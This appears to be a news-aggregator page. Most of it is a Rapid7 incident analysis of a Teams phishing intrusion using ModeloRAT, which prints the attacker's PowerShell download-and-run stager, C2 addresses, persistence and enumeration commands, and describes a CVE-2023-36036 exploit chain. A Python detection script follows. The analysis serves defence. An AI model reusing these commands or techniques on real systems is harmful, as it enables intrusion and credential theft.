statement Meta issued earlier. Read more of this story at Slashdot.
Alexa for Shopping offers a voice- and touch-enabled shopping experience across mobile, desktop, and Echo Show smart displays. Alexa for Shopping provides more personalized recommendations and automates the shopping experience across Amazon and other online retailers.
New “Sweet Attack” platform uses runtime intelligence and continuous agentic red teaming to identify exploitable attack chains human teams may miss. The post Sweet Security Launches Agentic AI Red Teaming to Counter ‘Mythos Moment’ appeared first on SecurityWeek.
SSAB's green transition in Oxelösund is being delayed after a power line was halted mid-construction. Vattenfall, which is building the line from Hedenlunda to the steelworks, points to shortcomings in the regulations, while two bird organizations have appealed, citing the risk of capercaillies flying into the cables. Despite nine years of work and 210 of 250 power-line pylons having been erected, changes may now force an entirely new permitting process.
Article URL: https://fredchan.org/blog/locality-domains-guide/ Comments URL: https://news.ycombinator.com/item?id=48122635 Points: 297 # Comments: 82
After achieving $2.2 billion in revenue in 2025, the defense tech startup has raised another massive round, led by Thrive and a16z, it says.
Overview
Attackers do not need to break into the front door when they can convince employees to open it for them through the tools they already trust.
In April 2026, Rapid7 investigated an enterprise intrusion that began with a Microsoft Teams message from a fake “IT Support” account and quickly escalated into a full compromise chain involving malware deployment, privilege escalation, credential theft, lateral movement, and exfiltration. The incident illustrates a critical risk for modern enterprises: Collaboration platforms have become part of the attack surface, and when combined with identity abuse and Living-off-the-Land techniques, they can provide attackers with a low-friction path into the environment.
This attack was particularly concerning due to the way the intrusion shifted from endpoint compromise to broader identity-driven risk. And while it was not surprising that the attacker used a novel technique, what was concerning was how the attacker was able to chain together familiar enterprise weaknesses into a fast-moving and operationally effective intrusion.
By abusing Teams external access, the threat actor delivered a Dropbox-hosted Python payload that established command-and-control, deployed multiple backdoors, and began mapping the internal environment. The attacker then escalated privileges to SYSTEM using CVE-2023-36036 before deploying a fake Windows lock screen designed to harvest the user’s domain password.
Once valid credentials were obtained, the intrusion shifted from endpoint compromise to broader identity-driven risk. The attacker moved laterally to a second host and used legitimate tooling such as DumpIt to collect system memory, which was likely exfiltrated via an anonymous file-sharing service.
This progression underscores a key reality for defenders: Once collaboration, identity, and endpoint controls are bypassed or weakened, attackers can rapidly convert initial access into meaningful enterprise exposure.
Rapid7’s technical analysis linked the Python malware to ModeloRAT, a framework previously documented by multiple security vendors in browser extension campaigns and associated with the KongTuke group. More broadly, this intrusion demonstrates how trusted communication channels, Living-off-the-Land techniques, and credential-focused tradecraft continue to challenge traditional security controls. The takeaways here are clear:
- For CISOs: Collaboration tools are part of your attack surface. Attackers used Teams to reach users directly. Security, identity protection, endpoint visibility, and rapid detection engineering must be treated as connected parts of the same defense strategy, not separate control domains.
- For defenders: Old vulnerabilities and trusted tools still work. The attack combined a patched vulnerability (CVE-2023-36036) with widely trusted tools like Python, PowerShell, and Dropbox. None of these are unusual in enterprise environments, which is precisely what allowed the attacker to blend in while moving quickly. It’s an obvious restatement, but external access should always be controlled and monitored. The challenge isn’t identifying one suspicious event; it’s recognizing when normal activity starts to form a pattern, and acting before that pattern turns into widespread exposure.
Rapid7 coverage
Rapid7 has coverage for this campaign across both intelligence and detection workflows. The campaign is available in Rapid7’s Intelligence Hub, providing customers with curated context, indicators, and threat actor tradecraft to support awareness, investigation, and prioritization.
Relevant detections are also available in InsightIDR, helping security teams identify activity associated with this intrusion pattern across their environments.
Figure 1: Attack chain from Teams phishing to payload delivery, ModeloRAT execution, privilege escalation, and lateral movement with exfiltration.
A door that was never closed
The intrusion started with abuse of Microsoft Teams external access. This feature, enabled by default in some environments, allows users in one tenant to initiate direct chats with users in another. In our incident, the attacker used a newly created tenant UCICasociacion.onmicrosoft[.]com to impersonate “IT Support” and messaged a targeted employee.
This approach mirrors tradecraft seen in Octo Tempest-style campaigns. Octo Tempest (alias Scattered Spider, UNC3944, 0ktapus) is a financially motivated cybercriminal group active since 2022, known for aggressive social engineering tactics including helpdesk impersonation, SIM swapping, and MFA manipulation. Shortly after the interaction, a hidden PowerShell command executed on the victim’s machine, staging the initial payload.
Stager: Bring your own Python
Within minutes of the Teams interaction, a PowerShell stager executed on the endpoint and reached out to Dropbox to retrieve a ZIP archive (Winp.zip) into the user’s AppData directory.
The archive was immediately extracted and deleted, likely to reduce on-disk artifacts and avoid potentially raising suspicion.
The payload contained a portable WinPython environment, which the attacker used to launch the next stage:
- collector.py (reconnaissance)
- Pmanager.py (primary C2 agent, Modelo RAT)
Execution was handled via pythonw.exe, which allowed the script to run in the background without showing the terminal window.
    iwr -Uri "https://www.dropbox[.]com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:appdata\Winp.zip"; Expand-Archive -Path "$env:appdata\Winp.zip" -DestinationPath "$env:appdata"; rm "$env:appdata\Winp.zip"; Start-Sleep -Seconds 5; Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\collector.py; Start-Sleep -Seconds 30; Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\Pmanager.py; Start-Sleep -Seconds 5
Figure 2: PowerShell stager retrieving and executing portable Python payload.
Reconnaissance: Environment discovery via native tools
The first Python module executed by the attacker was collector.py, a post-exploitation information gatherer designed to silently profile the host and save the results to %TEMP%\configA.json. Before any reconnaissance, collector.py computes a host fingerprint. This 8-character fingerprint is what the operator's C2 server uses to identify this victim.
The script gathered the following information:
- System identity and patch level: systeminfo, domain queries
- Privilege context: whoami /all and .NET Security.Principal checks (USER / ADMIN / SYSTEM)
- Processes and services: Get-Process, Get-Service
- Network visibility: getmac.exe, arp -a, Get-NetTCPConnection, ping.exe
- Domain visibility: ran adsisearcher to enumerate accessible systems
- AV-Solutions: Securityhealthhost.exe, which is commonly used to verify if anti-virus solutions are running on the system
Table 1: Host Reconnaissance and Environment Enumeration.
All of these commands were executed through hidden PowerShell sessions using the CREATE_NO_WINDOW flag, allowing the script to run in the background without spawning visible console windows.
Reconnaissance also included collecting installed hotfixes and system version data. The attacker was able to assess whether the host was vulnerable to a version-specific local privilege escalation exploit later used in the intrusion.
Additionally, collector.py and all other Python modules dropped by the malware were obfuscated. However, it was not difficult to recover code structure close to the original.
Figure 3: Obfuscated collector.py
Stage 2: Ties to ModeloRAT
Shortly after reconnaissance is completed, the attack shifts into its second stage with the execution of Pmanager.py.
    pythonw.exe ...\python\Pmanager.py start
Figure 4: Execution of Pmanager.py initiating second-stage C2 activity.
As soon as it is started, the script creates a long-running HTTP beacon over port 80 that rotates across 5 hardcoded C2 servers: 46.225.231[.]170, 144.172.99[.]68, 64.94.85[.]158, 140.82.6[.]45, and 45.76.241[.]51.
The script can load DLLs via rundll32.exe, launch additional Python scripts, run PowerShell commands, or install .msi packages. It also handles persistence and can update or remove itself. The reconnaissance output saved in configA.json is sent back to the C2, giving the operator a full picture of the host before issuing further tasks.
This behavior closely matches the ModeloRAT framework documented by Huntress (KongTuke / CrashFix campaigns). Its communication format, persistence mechanisms, and delivery model all match what has been previously observed, with no significant deviations.
The key difference is in initial access: Where earlier campaigns relied on malicious browser extensions, this intrusion used Microsoft Teams social engineering to achieve execution.
The on-demand shells and the WebDAV
Pmanager quickly deployed its first additional module USOShared1297.py onto the infected host. This module is a TCP reverse shell that opens 2 outbound sockets to one of 3 hardcoded C2 IPs (144.172.88[.]18, 64.190.113[.]187, 45.59.122[.]231). Port 50508 is reserved for the interactive shell that the attacker can use and port 60503 is for file transfer.
The shell itself is a cmd.exe spawned using CreatePipe and CreateProcessA with the CREATE_NO_WINDOW and STARTF_USESTDHANDLES flags.
This access was then used to test credential reuse across the environment through repeated WebDAV authentication attempts against internal systems.
    rundll32.exe davclnt.dll,DavSetCookie http:///C%24/Windows
Figure 5: WebDAV authentication spray using davclnt.dll (DavSetCookie)
The DavSetCookie API forces Windows to initiate a WebDAV authentication attempt using the current user’s credentials. In effect, it allows the attacker to validate where those credentials are accepted without deploying additional tools. Within minutes, successful logon events started to appear across more than 100 internal systems.
The HTTP shell – internal.py
Not long after, the attacker added a second way into the system by deploying, back-to-back, Microsoft5237.py dropped to %TEMP% and internal.py dropped to WPy64-31401\python. Later analysis showed they were actually the same file, just renamed (both had the same SHA-256 hash: 930263c0843744e269b615fb2ec79f83d7bd8b2cbf75e31fd5ea6c1aaa4e48fd). The attacker was reusing the same backdoor under different names.
Each script launched a hidden PowerShell session. First it checked whether the system was domain-joined, and then set up a persistent remote shell.
    powershell -NonInteractive -NoProfile -WindowStyle Hidden -Command "(Get-CimInstance Win32_ComputerSystem).Domain"
    powershell -NoProfile -NoExit -Command -
Figure 6: The -NoExit flag keeps PowerShell running in the background, while the trailing “-” allows it to accept commands remotely.
From there, internal.py turned that session into a full HTTP-based control channel. It registered with the C2 via /handshake, continuously polled for instructions via /command/, executed them inside the PowerShell session, and returned output via /output/. The same channel handles file upload, download, and also screenshot capture.
All of this communication ran over port 80 to 87.120.186[.]229 and 149.248.78[.]202, blending in with normal web traffic.
Stage 3: Privilege escalation via CVE-2023-36036
After gaining remote access, the attacker executed ssss.dll to escalate privileges.
    rundll32.exe ssss.dll startproc Mw2[REDACTED]
Figure 7: Execution of ssss.dll via rundll32.
The argument that was passed to startproc is a decryption key. The startproc function uses Mw2[REDACTED] to decrypt the payload.
The ssss.dll (SHA-256: b00c1cbcfb98d2618a5c2ccb311da94f3c57709a397be6c8de29839f4e943976) is a reflective loader. The loader uses that key to decrypt an embedded payload in memory and execute it. The decrypted payload is testdllLPE.dll (SHA-256: d84245f3a374dd5eff8ecfdfad39077d76331fde799e5306430d0fc788db7f1d), a custom privilege escalation exploit targeting CVE-2023-36036. This vulnerability is a heap-based buffer overflow in cldflt.sys, the Windows Cloud Files Mini Filter Driver.
Within seconds, the helper thread launched internal.py under a SYSTEM token, confirming that the exploit successfully modified the process privileges.
What is CVE-2023-36036?
The Cloud Files driver is what makes OneDrive's "Files On-Demand" work, allowing placeholder files to appear locally while being backed by cloud storage. Sync providers (OneDrive, Dropbox, Box) register themselves with the driver using the Cloud Files API, and the driver brokers I/O between the filesystem and the provider.
CVE-2023-36036 is a heap buffer overflow in how cldflt.sys processes messages from these providers. By sending crafted data through the driver’s communication interface, an attacker can overflow an internal buffer and corrupt adjacent memory. With controlled heap layout, this corruption becomes a kernel write primitive.
Reused technique, adapted exploit
While analyzing the CVE-2023-36036 exploit, it became clear that the threat actor did not build their methodology from scratch.
STAR Labs documented a similar chain in their analysis of CVE-2021-31969, also in cldflt.sys. Their work outlined the core steps: Register a fake sync provider, shape the kernel heap, trigger the overflow, and overwrite a token.
The exploit we analyzed follows the same general playbook, but adapts it for the CVE-2023-36036 vulnerability.
The threat actor reused three core steps from the STAR Labs research to stabilize their exploit:
- Sync provider registration. The exploit registers itself as "PLURIBUS" with GUID {904EE598-0511-4664-82A8-22C4A7501044}, pointing to %TEMP%\cldflt. This causes the driver to treat the directory as a valid Cloud Files root and route file operations through the vulnerable path.
- WNF heap shaping. The exploit uses 4 undocumented ntdll syscalls (NtCreateWnfStateName, NtUpdateWnfStateData, NtDeleteWnfStateData, and NtQueryWnfStateData) to allocate a large number of small objects in the kernel pool. This shapes memory so the overflow lands on controlled data instead of random structures. Without this step, the buffer overflow in cldflt.sys would write to unpredictable addresses and could crash the system.
- Data-only token overwrite. Instead of using process injection or shellcode, the exploit modifies its own token in kernel memory by flipping a privilege bit to gain SYSTEM access.
What sets testdllLPE.dll apart is what the operator added on top of that scaffolding.
- Kernel discovery method. It probes the kernel address range in 1 MB steps, measuring minute differences in memory access latency to identify ntoskrnl base. This avoids calling privileged APIs.
- Decoupled execution model. Instead of elevating the thread running the exploit, this binary spawns a helper thread that continuously polls PrivilegeCheck(SeDebugPrivilege). This allows the main exploit thread to crash, hang, or retry the kernel write multiple times without losing the payload. The moment the kernel finally flips the privilege bit, the helper thread detects the change and immediately launches internal.py as SYSTEM.
- Trigger path. The vulnerability is reached through the driver’s message handling path. When processing a FilterSendMessage request, cldflt.sys copies attacker-controlled data into a fixed-size buffer without proper bounds checking, overflowing into adjacent memory, specifically a function pointer.
To trigger execution, the exploit creates a placeholder file within the fake sync root and writes to it.
Figure 8: CVE-2023-36036 trigger sequence in startproc. A crafted 512-byte message is delivered via FilterSendMessage, a 1024-iteration WNF spray seats the fake kernel object, and the closing WriteFile fires the corrupted callback.
When the driver intercepts the write to Link.log, it invokes the corrupted function pointer. This results in a controlled kernel write, which flips the SeDebugPrivilege bit in the helper thread's token.
After the WriteFile call completes, the main exploit thread exits. The helper thread, which was polling PrivilegeCheck(SeDebugPrivilege) once per second since the exploit started, detects the change and breaks out of its loop. At this point, the privilege escalation has succeeded. The helper thread immediately launches the payload.
Figure 9: Helper thread execution after privilege escalation succeeds.
Stage 4: Post-exploitation
The newly spawned internal.py process was running under a SYSTEM token.
The attacker confirmed this with whoami and immediately created a scheduled task (TempLogA) to execute internal.py daily at 13:00 with SYSTEM privileges.

    schtasks /create /tn TempLogA /tr "C:\Users\USER\AppData\Roaming\WPy64-31401\python\pythonw.exe internal.py" /sc daily /st 13:00 /ru SYSTEM /rl HIGHEST /f

Figure 10: Creation of SYSTEM-level scheduled task (TempLogA) for persistence.

With persistence in place, the attacker moved on to Active Directory enumeration.

    $d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().GetDirectoryEntry().distinguishedName
    $s = New-Object DirectoryServices.DirectorySearcher([ADSI]"LDAP://$d")
    $s.PageSize = 1000
    $s.Filter = "(objectClass=user)"
    $s.FindAll().Count

Figure 11: PowerShell command returns the total number of domain user accounts.

Shortly after, the compromised account established a remote PowerShell session (WinRM) to a second host. Once connected, additional enumeration commands were executed through the remote PowerShell process (wsmprovhost.exe), extending visibility beyond the initial system.

Expanding the foothold

Within hours of privilege escalation and enumeration, 3 additional Python modules were deployed:

- Microsoft5237.py: HTTP beacon to 87.120.186.229 and 149.248.78.202. Captures screenshots via PowerShell, monitors user logins/logouts, uploads files to C2.
- Dell508.py: Reverse TCP tunnel to 207.246.114.50 and 149.28.96.170 on port 80, disguised as HTTP upgrade. C2 server instructs victim to connect to specific internal targets; victim relays traffic bidirectionally.
- PCDr6967.py: SOCKS5 proxy to 96.9.125.29, 144.172.111.49, and 104.194.152.246 on port 50504. Routes attacker's tools (RDP, browsers, Nmap) through victim into internal network.

Stage 5: The lock screen that wasn't

Roughly two hours after privilege escalation, the attacker deployed a second DLL.

    rundll32.exe com6848.dll,open e8vy[REDACTED]

Figure 12: Execution of com6848.dll via rundll32 to deploy credential harvesting payload.

The com6848.dll (SHA-256: 30e5a6c982396cdf3157195b540f75096869baa8570f66fab88c07c161be27f0, internal name apple.dll) is a 32-bit DLL with a single export, open. Its .rdata section is over 5 MB and contains an encrypted payload. The decryption key was conveniently provided on the command line by the attacker.

Once decrypted, the DLL reflectively loads a second stage, stage2.dll (SHA-256: f5b2dbd8ec9671c0261f093ebc5f3d35920b592458a3b800cc946265111e67d0). This DLL renders a perfect replica of the Windows 10 lock screen, using the embedded font to ensure visual accuracy even on systems where the font isn't installed. The user sees what appears to be a normal screen lock and types their password to unlock it. The DLL captures it and writes the result to disk as yyyy-mm-dd-Log.txt.

What the credential unlocked

Wait, didn't the operator already have SYSTEM privileges? Why bother with a fake lock screen?

By this point, the operator did indeed have SYSTEM-level access on the host. What they didn't have, though, was the user's domain credentials. SYSTEM can authenticate using the machine account, but it cannot authenticate as the user. It can't access user-specific resources, such as file shares requiring the user's permissions, mailboxes, web applications expecting user credentials, or RDP sessions that need to establish an interactive logon as that specific domain account.

The same evening, the attacker used harvested credentials to authenticate via RDP to another workstation in the network. DNS logs showed connections to Dropbox and some internal systems.
They also performed Kerberoasting against service accounts, requesting vulnerable Kerberos tickets in an attempt to expand access within the environment.

The following morning, the attacker returned to the second host via RDP and used Microsoft Edge to download the Comae toolkit, including DumpIt, a legitimate memory acquisition tool. Two minutes after unarchiving the Comae toolkit, the threat actor navigated within the browser to uploadnow[.]io, which offers free anonymous file upload features. During this browser session, the threat actor searched Bing to check whether SwissTransfer was a safe site to transfer large files, likely evaluating additional exfiltration methods. Shortly after, DumpIt.exe was executed on the second host. DumpIt captures physical RAM, including LSASS process memory, which can contain cleartext passwords, NTLM hashes, and Kerberos tickets. Based on timing and network activity, the memory dump was likely exfiltrated via uploadnow[.]io.

MITRE ATT&CK techniques

TECHNIQUE ID | TECHNIQUE NAME
T1566.003 | Phishing: Spearphishing via Service
T1204.002 | User Execution: Malicious File
T1059.001 | Command & Scripting: PowerShell
T1059.006 | Command & Scripting: Python
T1218.011 | System Binary Proxy Execution: Rundll32
T1106 | Native API
T1053.005 | Scheduled Task/Job: Scheduled Task
T1068 | Exploitation for Privilege Escalation
T1134.001 | Access Token Manipulation: Token Impersonation
T1134.004 | Access Token Manipulation: Parent PID Spoofing
T1562.001 | Impair Defenses
T1027 | Obfuscated Files or Information
T1027.002 | Software Packing
T1027.009 | Embedded Payloads
T1620 | Reflective Code Loading
T1036.005 | Masquerading
T1140 | Deobfuscate/Decode Files or Information
T1112 | Modify Registry
T1055 | Process Injection
T1056.002 | Input Capture: GUI Input Capture
T1558.003 | Steal or Forge Kerberos Tickets: Kerberoasting
T1003.001 | OS Credential Dumping: LSASS Memory
T1003 | OS Credential Dumping
T1018 | Remote System Discovery
T1087.002 | Account Discovery: Domain Account
T1082 | System Information Discovery
T1016 | System Network Configuration Discovery
T1033 | System Owner/User Discovery
T1083 | File and Directory Discovery
T1021.006 | Remote Services: WinRM
T1021.001 | Remote Services: RDP
T1570 | Lateral Tool Transfer
T1071.001 | Application Layer Protocol: Web Protocols
T1095 | Non-Application Layer Protocol
T1090.001 | Proxy: Internal Proxy
T1090.002 | Proxy: External Proxy
T1572 | Protocol Tunneling
T1573 | Encrypted Channel
T1132.001 | Data Encoding: Standard Encoding
T1568 | Dynamic Resolution
T1567.002 | Exfiltration Over Web Service
T1041 | Exfiltration Over C2 Channel

Indicators of compromise (IOCs)

Category | Indicator Type | Value
Attacker Infrastructure | Rogue M365 Tenant (Sender) | itsupport@UCICasociacion.onmicrosoft.com
Attacker Infrastructure | Tenant GUID | cdc15b4d-6fd6-4e90-9ee9-357fea475047
Attacker Infrastructure | Client Hostnames | RICARDOGARC05B2, KALI-LINUX-2025-2
Attacker Infrastructure | Initial Access Vector | MS Teams external chat (Impersonating "IT Support")
Network C2 | Pmanager.py (ModeloRAT Beacon) | 46.225.231.170, 144.172.99.68, 64.94.85.158, 140.82.6.45, 45.76.241.51
Network C2 | collector.py (Exfiltration) | 87.120.186.229, 149.248.78.202 (Port 80)
Network C2 | internal.py / Microsoft5237.py | 87.120.186.229, 149.248.78.202 (Port 80)
Network C2 | USOShared1297.py (TCP Shell) | 144.172.88.18, 64.190.113.187, 45.59.122.231 (Ports 50508, 60503)
Network C2 | PCDr6967.py (SOCKS5) | 96.9.125.29, 144.172.111.49, 104.194.152.246 (Port 50504)
Network C2 | Dell508.py (HTTP Tunnel) | 207.246.114.50, 149.28.96.170 (Port 80)
Persistence Host | Cloud Files Provider Name | PLURIBUS
Persistence Host | Cloud Files Provider GUID | {904EE598-0511-4664-82A8-22C4A7501044}
Persistence Host | Registry Persistence Key | HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManager\PLURIBUS!*
Persistence Host | Sync Root Path | %TEMP%\cldflt\
Persistence Host | Placeholder File | %TEMP%\cldflt\Link.log

More indicators of compromise can be found on Rapid7's GitHub.

Key findings

- ModeloRAT pivoted from browser extensions to Teams social engineering.
- Portable Python environments bypass traditional EDR signatures.
- CVE-2023-36036 remains effective despite patch availability.
- Fake lock screens can harvest credentials even with SYSTEM access.
- WebDAV API abuse provides stealthy credential validation.

It took two days to go from "Hi, this is IT support" to domain-wide credential access using a fake lock screen, a Python-based RAT, and a two-year-old kernel exploit. If you were an incident responder, none of these techniques would have been new for you, and that's the point.

What particularly stands out is how quickly control shifted from endpoint to identity. Once valid credentials were obtained, the environment itself became the attack surface.
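Two of the host artifacts reported above, the PLURIBUS sync root registered under SyncRootManager and the TempLogA scheduled task, can be turned into triage rules. The following is an added example, not code from Rapid7 or the original article: a Python triage over constructed events shaped loosely like Sysmon registry and process-creation records. The field names, the placeholder SID and the provider allowlist are assumptions.

```python
"""Added example: triage rules for two host artifacts from this intrusion.
Events are CONSTRUCTED, shaped loosely like Sysmon EventID 1 (process creation)
and EventID 13 (registry value set); field names, SID and allowlist are assumed.
"""
import re

SYNC_ROOT_KEY = (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"
                 r"\Explorer\SyncRootManager") + "\\"
TEMP_DIR = re.compile(r"\\appdata\\local\\temp(\\|$)|\\windows\\temp(\\|$)|%temp%", re.I)
USER_PROFILE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
KNOWN_PROVIDERS = {"onedrive"}  # assumption: sync providers this fleet expects
VERBS = {"/create", "/change", "/delete", "/run", "/query", "/end"}


def parse_schtasks(cmdline):
    """Split a schtasks command line into {switch: value}; None if not schtasks."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    if not tokens or not re.search(r"(^|\\)schtasks(\.exe)?$", tokens[0].strip('"'), re.I):
        return None
    opts, i = {"verb": None}, 1
    while i < len(tokens):
        tok = tokens[i].lower()
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if tok in VERBS:
            opts["verb"] = tok
        elif tok.startswith("/") and nxt is not None and not nxt.startswith("/"):
            opts[tok] = nxt.strip('"')   # switch with a value, e.g. /tn TempLogA
            i += 1
        elif tok.startswith("/"):
            opts[tok] = True             # bare flag, e.g. /f
        i += 1
    return opts


def check_task(event):
    """Flag task creation that runs as SYSTEM from a user-writable profile path."""
    opts = parse_schtasks(event.get("CommandLine", ""))
    if not opts or opts["verb"] != "/create":
        return None
    run_as = str(opts.get("/ru", "")).lower()
    target = str(opts.get("/tr", ""))
    if run_as in ("system", r"nt authority\system") and USER_PROFILE.search(target):
        return {"rule": "system_task_from_user_path",
                "task": opts.get("/tn"), "target": target}
    return None


def check_sync_root(event):
    """Flag Cloud Files sync roots that are unexpected or live in a temp dir."""
    key = event.get("TargetObject", "")
    if not key.lower().startswith(SYNC_ROOT_KEY.lower()):
        return None
    provider = key[len(SYNC_ROOT_KEY):].split("\\")[0].split("!")[0]
    path = event.get("Details", "")
    reasons = []
    if provider.lower() not in KNOWN_PROVIDERS:
        reasons.append("provider not on allowlist")
    if TEMP_DIR.search(path):
        reasons.append("sync root inside a temp directory")
    if not reasons:
        return None
    return {"rule": "rogue_sync_root", "provider": provider,
            "path": path, "reasons": reasons}


RULES = {1: check_task, 13: check_sync_root}


def triage(events):
    """Run the rule registered for each event's EventID; return the findings."""
    hits = (RULES[ev["EventID"]](ev) for ev in events if ev.get("EventID") in RULES)
    return [hit for hit in hits if hit]


SID = "S-1-5-21-0-0-0-1001"  # constructed placeholder SID
SAMPLE_EVENTS = [  # constructed; the first schtasks line is the one quoted above
    {"EventID": 13,
     "TargetObject": SYNC_ROOT_KEY + "PLURIBUS!" + SID + "!demo\\UserSyncRoots\\" + SID,
     "Details": r"C:\Users\USER\AppData\Local\Temp\cldflt"},
    {"EventID": 13,
     "TargetObject": SYNC_ROOT_KEY + "OneDrive!" + SID + "!Personal\\UserSyncRoots\\" + SID,
     "Details": r"C:\Users\USER\OneDrive"},
    {"EventID": 1,
     "CommandLine": r'schtasks /create /tn TempLogA /tr "C:\Users\USER\AppData\Roaming'
                    r'\WPy64-31401\python\pythonw.exe internal.py" /sc daily /st 13:00'
                    r' /ru SYSTEM /rl HIGHEST /f'},
    {"EventID": 1,
     "CommandLine": r'schtasks /create /tn NightlyBackup /tr "C:\Program Files\Backup'
                    r'\agent.exe" /sc daily /ru SYSTEM'},
    {"EventID": 1, "CommandLine": "whoami"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The benign OneDrive sync root and the SYSTEM task launched from Program Files are included to show what the rules leave alone; extend KNOWN_PROVIDERS to match the sync clients actually deployed before using the allowlist reason as a signal.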
Open original transmissionThe retail trading subreddit submitted the sharpest criticism yet of the financial regulator's idea of letting companies report twice per year.
Open original transmission Roony Bardghji, 20, was not given a place in Sweden's World Cup squad. According to Aftonbladet, the omission was due in part to the Barcelona player having shown dissatisfaction over a lack of playing time. "This is news to me," Graham Potter tells SVT Sport.
Open original transmissionTen students from an elite secondary school in Hong Kong were injured or experienced ringing in their ears after a self-heating hotpot pack exploded in a classroom on Wednesday. A police spokesman said officers received a report from St Paul’s Co-educational College in Mid-Levels at 3.29pm that a self-heating hotpot pack had exploded after being improperly heated. A source said a 15-year-old boy was preparing the hotpot pack at about 1pm when he poured hot water onto it, and it exploded. Six...
Open original transmissionThe voluntary recall follows an incident on 20 April where an empty Waymo car entered a flooded road in San Antonio, Texas.
Open original transmissionBBC Chief Political Correspondent Henry Zeffman explains what is next for the government after the King's Speech.
Open original transmissionThe government-appointed administrator of Hong Kong’s fire-ravaged Wang Fuk Court has sought to delay an owners’ meeting, prompting calls from residents to hold it before the end of June to address concerns ahead of a decision on whether to sell their flats. The move by Hop On Management Company came after more than 240 owners, representing over 12 per cent of households at the estate in Tai Po, petitioned the administrator in late April to hold an extraordinary general meeting (EGM), warning...
Open original transmission SVT can reveal that Dante Peykar is suspected of being part of Iran's proxy war in Sweden. The 41-year-old, who is now being listed as a high-priority target on Europol's most wanted list, is reportedly linked to the alias that ordered the attempted murder of Iran expert Arvin Khoshnood.
Open original transmissionMicrosoft has fixed a Windows Autopatch bug that caused driver updates restricted by administrative policies to be deployed on some Autopatch-managed Windows devices in the European Union. [...]
Open original transmission Photo artist Erik Johansson is a worldwide success with his surreal photographs, inspired by Dalí and Magritte. He lives in the Czech Republic, but he takes many of his pictures in the surroundings of his parents' farm in Svenstorp outside Götene, where his permanent gallery has also just opened for the season. "There is something magical about the places where I grew up," says Erik Johansson.
Open original transmission There is now one month left until the football World Cup opens in Mexico City. Three Mexican cities will host the world's biggest football festival. One of them is Mexico's second-largest city, Guadalajara, where residents have long had problems with polluted water. Companies from all over the world have set up here, attracted by tax breaks. For a long time there were no environmental rules at all for what the factories were allowed to discharge into the river that runs around the city. Today, the rules that exist are not followed. "We intend to use the World Cup to protest, even though they are trying to scare us into silence," says environmental activist Sofia Enciso.
Open original transmissionOne seeks contractor to manage millions in taxpayer cash, will provide generous 20% off Windsor biscuit tins and tea towels
Open original transmissionDid MS change the cadence in which they release M365 updates starting this Patch Tuesday? This is the first time a monthly enterprise channel release hasn’t aligned with Patch Tuesday, to my recollection. Maybe they’re just behind schedule? submitted by /u/xboxgaming1992 [link] [comments]
Open original transmissionEmail filters are important, but they can’t remove phishing risk on their own. Today’s campaigns are built to slip through the cracks, using fresh domains, CAPTCHA checks, fake login pages, OTP theft, and even legitimate RMM tools. For security leaders, the bigger issue is business exposure. One missed email can slow response, create uncertainty, and leave teams unsure […] The post How Top SOCs and MSSPs Prevent Phishing Incidents Missed by Email Filters appeared first on Cyber Security News.
Open original transmissionU.S. House lawmakers want to know how hackers broke into education tech giant Instructure twice and stole reams of data from students who use the company's flagship student data software Canvas.
Open original transmissionWe have some iPad Air's that we use for kiosks, and they seem to work fine. However, we have a place where there are a large number of patrons with sight disabilities. So, we were thinking about adding a wired 27-inch external display to it, along with a physical keyboard. Is there any reason this wouldn't be just as reliable as a standalone iPad Air? submitted by /u/FatBook-Air [link] [comments]
Open original transmission[AI generated] N/A
Open original transmission In the United Kingdom, the ceremonial opening of Parliament took place, where the King read out Prime Minister Keir Starmer's government programme. But at the same time the government is in crisis, and there are growing signs that Starmer will face a challenge for power. Some signs suggest that he may be formally challenged as early as tomorrow. The person all eyes are now on is the British Health Secretary, Wes Streeting.
Open original transmissionAre the pockets of Jeff Bezos not as deep as everyone thinks?
Open original transmissionFoxconn has officially confirmed a cyberattack targeting its North American operations after the Nitrogen ransomware gang publicly listed the company on its data leak site, claiming to have stolen a staggering 8 terabytes of sensitive data. The Nitrogen ransomware group made its move on Monday, posting Foxconn on its breach and extortion portal and asserting […] The post Foxconn Confirms Cyberattack After Nitrogen Ransomware Gang Claim appeared first on Cyber Security News.
Open original transmission In this year's Eurovision Song Contest, Finland is represented by a duo: violinist Linda Lampenius and singer Pete Parkkonen, who together perform the song Liekinheitin. Parkkonen's career began with the Finnish Idol competition and reached new heights with a much-discussed music video that gave him sex-symbol status.
Open original transmissionAnker's new Prime 3-in-1 Wireless Charging Station has been marked down to $104.99 on Amazon, down from $149.99. This is one of Anker's newest accessories, and Amazon's sale today is a match of the all-time low price. This deal, and many of the others shared below, is being matched at Anker.com, with additional savings applied for members. Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running. The Prime 3-in-1 Wireless Charging Station features Qi2.2 support, which lets a compatible MagSafe iPhone charge at up to 25W. It's the same speed as Apple's MagSafe charger, and it is 10W faster than the standard Qi2 MagSafe chargers. You can also simultaneously charge an Apple Watch and AirPods with the device. $45 OFFAnker Prime 3-in-1 Wireless Charging Station for $104.99 There are plenty of other Anker discounts happening on Amazon this week, including Anker's popular 3-in-1 MagSafe-Compatible Charging Cube for $86.99, down from $129.99. Below you'll find a list of the best Anker discounts on Amazon this week, also including wall chargers, portable chargers, and more. Although it's not on sale, Anker recently launched a new desktop charging accessory with the Anker Nano Desk Clamp Power Strip for $69.99. The new device attaches to your desk and has 10 total ports including six AC outlets, two USB-C ports, and two USB-A ports. It supports 70W USB-C fast charging and comes in white and black color options. 
